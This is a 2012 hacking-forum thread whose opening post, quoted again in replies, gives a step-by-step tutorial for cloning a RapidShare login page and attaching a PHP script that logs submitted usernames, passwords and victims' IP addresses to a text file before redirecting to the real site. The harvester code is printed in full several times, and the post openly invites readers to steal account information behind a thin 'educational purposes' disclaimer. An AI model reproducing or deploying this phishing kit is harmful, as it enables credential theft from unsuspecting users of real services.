Post: TUTORIAL: How To Make A Phishing Site.
Options
06-07-2012, 06:29 PM
#1
HonuCinema
Maggbot timeout!
Definition Of Phishing:
Tutorial
1. For this tut, we will use rapidshare.com as our page that we would like to make a phisher of.
2. Go to [url=https://www.rapidshare.com]RapidShare รข€“ Secure Data Logistics[/url] and navigate to the premium account log-in screen at the url : [url]https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi[/url]
3. We will now begin to make our phisher. Start by right clicking on the page and click view source.
4. Select all and paste into a notepad document.
5. You should see a bunch of random html coding, but we are only interested in two words: method and action.
6. Do a search in the document for the word "method" (without quotes).
7. Your result should be something like : method="post"
8. Change the word post to the word get.
9. Now do a search for the word "action" (without quotes). action is usually very close to method so you may not even have to do a search for it.
10. You should see something like this: action="https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi"
11. Where the url in between the quotes is, replace the text with next.php so the new part says: action="next.php"
12. Save this file as index.html and create a new document on notepad.
13. In the new document, we will be making the next.php page, or the page that they are directed to after you have gotten their log-in information.
14. Copy and paste this code into the notepad document:
CODE
$datum = date('d-m-Y / H:i:s'
;
$ip = $_SERVER['REMOTE_ADDR'];
header("Location: Put your REDIRECT URL Here");
$handle = fopen("password.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "
");
}
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)
");
fwrite($handle, "
");
fclose($handle);
setcookie ("user", "empty", time()+3600);
exit;
?>
15. after the word location, where it says redirect url here, put in the original log-in screen url, or the url of the page that you want to send them after they type in their information. My next.php file looks like this:
CODE
$datum = date('d-m-Y / H:i:s';
$ip = $_SERVER['REMOTE_ADDR'];
header("Location: https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi");
$handle = fopen("password.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "
");
}
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)
");
fwrite($handle, "
");
fclose($handle);
setcookie ("user", "empty", time()+3600);
exit;
?>
16. Save this file as next.php and open up a new notepad document.
17. Save this document as password.txt. The file that you need to save it as is in the next.php file right here:
$handle = fopen("password.txt", "a");
I chose password.txt as my file where I want the passes to be stored, but you can change it to anything you want.
18. Go to a free web hosting client that supports php files, my personal favorite is freeweb7.com, and upload the 3 files, making sure to delete any files that were uploaded by the web host themselves, such as a sample index.html page.
19. Go check your url and type in test as the user and test as the pass and then navigate to your pass file and see if it shows up. If it shows up SUCCESS!!! It is time to start phishing.
Happy Phishing Guys!!!
(Sorry if its already been posted, I checked and didn't find it.)
Last edited by
HonuCinema ; 06-07-2012 at 06:34 PM.
The following 4 users say thank you to HonuCinema for this useful post:
06-10-2012, 06:45 PM
#21
Forgive
[MOVE]I am a independent black woman. [/MOVE]
Originally posted by yakat
So, you think you know more about hacking than me? I would destroy you within a minute if I didn't want to see what type of a noob you are. And, for your information, phishing is for script kiddies with no potential skills whatsoever. I am new to this site, but I have been on hundreds of other hacking/coding websites and have been doing this stuff for years. So, would you kindly shut the F*** up.
Shut up. You have 4 posts and 10 rep. Obviously your posts aren't worth getting repped. If you want to make a name and think your so good at hacking make a thread better than this one.I could also bet anyone that you are a 10 year old kid that came to leech here and goes on psn saying you can hack people's accounts.
The following user thanked Forgive for this useful post:
06-10-2012, 07:02 PM
#22
Forgive
[MOVE]I am a independent black woman. [/MOVE]
Originally posted by Fruity
Hey, Whats Up Guys. This is a step by step tutorial on how to make a phishing page to get account information for various websites from many people. This is only how to make the page, but it is up to you to decide how you are going to get people to fall for it. Whether it be a fake E-Mail message, or PM over Another site. This can be very fun to mess with people, or if you are really looking to steal someones information. This is intended for educational purposes only and I am NOT responsible if you get in trouble. Good Luck.
Definition Of Phishing:
Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, You must login or register to view this content., and credit card details by masquerading as a trustworthy entity in an You must login or register to view this content.. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by You must login or register to view this content.You must login or register to view this content. or You must login or register to view this content.,[SUP]You must login or register to view this content.[/SUP] and it often directs users to enter details at a fake website whose You must login or register to view this content. are almost identical to the legitimate one. Phishing is an example of You must login or register to view this content. techniques used to deceive users,[SUP]You must login or register to view this content.[/SUP] and exploits the poor usability of current web security technologies.[SUP]You must login or register to view this content.[/SUP] Attempts to deal with the growing number of reported phishing incidents include You must login or register to view this content., user training, public awareness, and technical security measures.A phishing technique was described in detail in 1987, and (according to its creator) the first recorded use of the term "phishing" was made in 1995. The term is a variant offishing,[SUP]You must login or register to view this content.[/SUP] probably influenced by You must login or register to view this content.,[SUP]You must login or register to view this content.[/SUP][SUP]You must login or register to view this content.[/SUP] and alludes to "baits" used in hopes that the potential victim will "bite" by clicking a malicious link or opening a malicious attachment, in which case their financial information and passwords may then be stolen.
Tutorial
Happy Phishing Guys!!!
(Sorry if its already been posted, I checked and didn't find it.)
Definition Of Phishing:
Tutorial
1. For this tut, we will use rapidshare.com as our page that we would like to make a phisher of.
2. Go to [url=https://www.rapidshare.com]RapidShare รขโฌโ Secure Data Logistics[/url] and navigate to the premium account log-in screen at the url : [url]https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi[/url]
3. We will now begin to make our phisher. Start by right clicking on the page and click view source.
4. Select all and paste into a notepad document.
5. You should see a bunch of random html coding, but we are only interested in two words: method and action.
6. Do a search in the document for the word "method" (without quotes).
7. Your result should be something like : method="post"
8. Change the word post to the word get.
9. Now do a search for the word "action" (without quotes). action is usually very close to method so you may not even have to do a search for it.
10. You should see something like this: action="https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi"
11. Where the url in between the quotes is, replace the text with next.php so the new part says: action="next.php"
12. Save this file as index.html and create a new document on notepad.
13. In the new document, we will be making the next.php page, or the page that they are directed to after you have gotten their log-in information.
14. Copy and paste this code into the notepad document:
CODE
$datum = date('d-m-Y / H:i:s';
$ip = $_SERVER['REMOTE_ADDR'];
header("Location: Put your REDIRECT URL Here");
$handle = fopen("password.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "
");
}
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)
");
fwrite($handle, "
");
fclose($handle);
setcookie ("user", "empty", time()+3600);
exit;
?>
15. after the word location, where it says redirect url here, put in the original log-in screen url, or the url of the page that you want to send them after they type in their information. My next.php file looks like this:
CODE
$datum = date('d-m-Y / H:i:s';
$ip = $_SERVER['REMOTE_ADDR'];
header("Location: https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi");
$handle = fopen("password.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "
");
}
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)
");
fwrite($handle, "
");
fclose($handle);
setcookie ("user", "empty", time()+3600);
exit;
?>
16. Save this file as next.php and open up a new notepad document.
17. Save this document as password.txt. The file that you need to save it as is in the next.php file right here:
$handle = fopen("password.txt", "a");
I chose password.txt as my file where I want the passes to be stored, but you can change it to anything you want.
18. Go to a free web hosting client that supports php files, my personal favorite is freeweb7.com, and upload the 3 files, making sure to delete any files that were uploaded by the web host themselves, such as a sample index.html page.
19. Go check your url and type in test as the user and test as the pass and then navigate to your pass file and see if it shows up. If it shows up SUCCESS!!! It is time to start phishing.
Happy Phishing Guys!!!
(Sorry if its already been posted, I checked and didn't find it.)
Lol, I'm confused wit hte first part. Can you pm the url to go to, that url is confusing me. Link me to it pl0x?
06-10-2012, 07:04 PM
#23
Forgive
[MOVE]I am a independent black woman. [/MOVE]
Originally posted by Fruity
Hey, Whats Up Guys. This is a step by step tutorial on how to make a phishing page to get account information for various websites from many people. This is only how to make the page, but it is up to you to decide how you are going to get people to fall for it. Whether it be a fake E-Mail message, or PM over Another site. This can be very fun to mess with people, or if you are really looking to steal someones information. This is intended for educational purposes only and I am NOT responsible if you get in trouble. Good Luck.
Definition Of Phishing:
Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, You must login or register to view this content., and credit card details by masquerading as a trustworthy entity in an You must login or register to view this content.. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by You must login or register to view this content.You must login or register to view this content. or You must login or register to view this content.,[SUP]You must login or register to view this content.[/SUP] and it often directs users to enter details at a fake website whose You must login or register to view this content. are almost identical to the legitimate one. Phishing is an example of You must login or register to view this content. techniques used to deceive users,[SUP]You must login or register to view this content.[/SUP] and exploits the poor usability of current web security technologies.[SUP]You must login or register to view this content.[/SUP] Attempts to deal with the growing number of reported phishing incidents include You must login or register to view this content., user training, public awareness, and technical security measures.A phishing technique was described in detail in 1987, and (according to its creator) the first recorded use of the term "phishing" was made in 1995. The term is a variant offishing,[SUP]You must login or register to view this content.[/SUP] probably influenced by You must login or register to view this content.,[SUP]You must login or register to view this content.[/SUP][SUP]You must login or register to view this content.[/SUP] and alludes to "baits" used in hopes that the potential victim will "bite" by clicking a malicious link or opening a malicious attachment, in which case their financial information and passwords may then be stolen.
Tutorial
Happy Phishing Guys!!!
(Sorry if its already been posted, I checked and didn't find it.)
Definition Of Phishing:
Tutorial
1. For this tut, we will use rapidshare.com as our page that we would like to make a phisher of.
2. Go to [url=https://www.rapidshare.com]RapidShare รข€“ Secure Data Logistics[/url] and navigate to the premium account log-in screen at the url : [url]https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi[/url]
3. We will now begin to make our phisher. Start by right clicking on the page and click view source.
4. Select all and paste into a notepad document.
5. You should see a bunch of random html coding, but we are only interested in two words: method and action.
6. Do a search in the document for the word "method" (without quotes).
7. Your result should be something like : method="post"
8. Change the word post to the word get.
9. Now do a search for the word "action" (without quotes). action is usually very close to method so you may not even have to do a search for it.
10. You should see something like this: action="https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi"
11. Where the url in between the quotes is, replace the text with next.php so the new part says: action="next.php"
12. Save this file as index.html and create a new document on notepad.
13. In the new document, we will be making the next.php page, or the page that they are directed to after you have gotten their log-in information.
14. Copy and paste this code into the notepad document:
CODE
$datum = date('d-m-Y / H:i:s';
$ip = $_SERVER['REMOTE_ADDR'];
header("Location: Put your REDIRECT URL Here");
$handle = fopen("password.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "
");
}
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)
");
fwrite($handle, "
");
fclose($handle);
setcookie ("user", "empty", time()+3600);
exit;
?>
15. after the word location, where it says redirect url here, put in the original log-in screen url, or the url of the page that you want to send them after they type in their information. My next.php file looks like this:
CODE
$datum = date('d-m-Y / H:i:s';
$ip = $_SERVER['REMOTE_ADDR'];
header("Location: https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi");
$handle = fopen("password.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "
");
}
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)
");
fwrite($handle, "
");
fclose($handle);
setcookie ("user", "empty", time()+3600);
exit;
?>
16. Save this file as next.php and open up a new notepad document.
17. Save this document as password.txt. The file that you need to save it as is in the next.php file right here:
$handle = fopen("password.txt", "a");
I chose password.txt as my file where I want the passes to be stored, but you can change it to anything you want.
18. Go to a free web hosting client that supports php files, my personal favorite is freeweb7.com, and upload the 3 files, making sure to delete any files that were uploaded by the web host themselves, such as a sample index.html page.
19. Go check your url and type in test as the user and test as the pass and then navigate to your pass file and see if it shows up. If it shows up SUCCESS!!! It is time to start phishing.
Happy Phishing Guys!!!
(Sorry if its already been posted, I checked and didn't find it.)
Lol I'm confused on the first part. Can you pm me the url and link me to it. From what I'm looking at that url is all in another language.
(Not really in another language but can you link me to it.)
Last edited by
Forgive ; 06-10-2012 at 07:05 PM.
Reason: Hmm double posted
06-10-2012, 11:00 PM
#24
MagicalMonkey
Little One
While I agree that it is not a true hack it is however a social engineering technique. Which requires you to think how you can make the most believable and effective phisher possible, even though it commonly used by noobs who lack the skills to do this in a effective way and is why the phisher receives a bad name. Good post Fruity, even though I may never use it. 
The following user thanked MagicalMonkey for this useful post:
06-11-2012, 06:12 PM
#25
HonuCinema
Maggbot timeout!
Originally posted by Alpha
Lol I'm confused on the first part. Can you pm me the url and link me to it. From what I'm looking at that url is all in another language. (Not really in another language but can you link me to it.)
(Not really in another language but can you link me to it.)
Ya, sorry about that bro lol, I dont know why its like that, its just You must login or register to view this content. (Rapidshare . com ). BTW it doesn't have to be rapidshare, it can be virtually any website.
The following 2 users say thank you to HonuCinema for this useful post:
06-12-2012, 05:24 PM
#27
HonuCinema
Maggbot timeout!
Copyright © 2024, NextGenUpdate.
All Rights Reserved.
